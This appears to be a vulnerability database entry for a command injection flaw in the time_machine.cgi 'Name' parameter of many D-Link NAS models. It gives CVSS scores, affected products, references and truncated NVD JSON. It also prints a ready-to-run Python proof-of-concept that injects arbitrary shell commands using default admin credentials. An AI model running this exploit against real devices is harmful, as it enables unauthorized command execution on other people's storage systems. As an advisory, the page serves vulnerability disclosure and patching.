CVE-2026-4210

Description

A security flaw has been discovered in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected by this vulnerability is the function cgi_tm_set_share of the file /cgi-bin/time_machine.cgi. The manipulation of the argument Name results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dnr-326_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1100-4_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-120_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-1200-05_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DNS-120 < 20260205

D-Link DNR-202L < 20260205

D-Link DNS-315L < 20260205

D-Link DNS-320 < 20260205

D-Link DNS-320L < 20260205

D-Link DNS-320LW < 20260205

D-Link DNS-321 < 20260205

D-Link DNR-322L < 20260205

D-Link DNS-323 < 20260205

D-Link DNS-325 < 20260205

D-Link DNS-326 < 20260205

D-Link DNS-327L < 20260205

D-Link DNR-326 < 20260205

D-Link DNS-340L < 20260205

D-Link DNS-343 < 20260205

D-Link DNS-345 < 20260205

D-Link DNS-726-4 < 20260205

D-Link DNS-1100-4 < 20260205

D-Link DNS-1200-05 < 20260205

D-Link DNS-1550-04 < 20260205

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-4210 PoC - D-Link NAS Command Injection
Affected: DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, 
          DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, 
          DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04
"""

import requests
import sys
import argparse

def exploit(target_ip, target_port=80, cmd='id', username='admin', password='admin'):
    """
    Exploit CVE-2026-4210 command injection vulnerability
    """
    # Construct the malicious payload
    # The Name parameter is vulnerable to command injection
    payload = f"'; {cmd} #"
    
    url = f"http://{target_ip}:{target_port}/cgi-bin/time_machine.cgi"
    
    # Prepare the request parameters
    params = {
        'func': 'cgi_tm_set_share',
        'Name': payload
    }
    
    # Authentication (may vary based on device configuration)
    auth = (username, password)
    
    print(f"[*] Target: {target_ip}:{target_port}")
    print(f"[*] Command: {cmd}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.get(url, params=params, auth=auth, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2026-4210 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)')
    parser.add_argument('-c', '--cmd', default='id', help='Command to execute')
    parser.add_argument('-u', '--username', default='admin', help='Username')
    parser.add_argument('-P', '--password', default='admin', help='Password')
    
    args = parser.parse_args()
    exploit(args.target, args.port, args.cmd, args.username, args.password)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4210/
[4] VulDB https://vuldb.com/cve/CVE-2026-4210
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_159/159.md
[6] https://vuldb.com/?ctiid.351121
[7] https://vuldb.com/?id.351121
[8] https://vuldb.com/?submit.770440
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4210", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:07.113", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected by this vulnerability is the function cgi_tm_set_share of the file /cgi-bin/time_machine.cgi. The manipulation of the argument Name results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 y DNS-1550-04 hasta el 20260205. Afectada por esta vulnerabilidad es la función cgi_tm_set_share del archivo /cgi-bin/time_machine.cgi. La manipulación del argumento Name resulta en inyección de comandos. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dnr-202l_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-02-05", "matchCriteriaId": "E20A03F5-6985-4917-8E5B-48963FB62AF2"}]}, {"operator": "OR", "negate": false, "cpeMatch ... (truncated)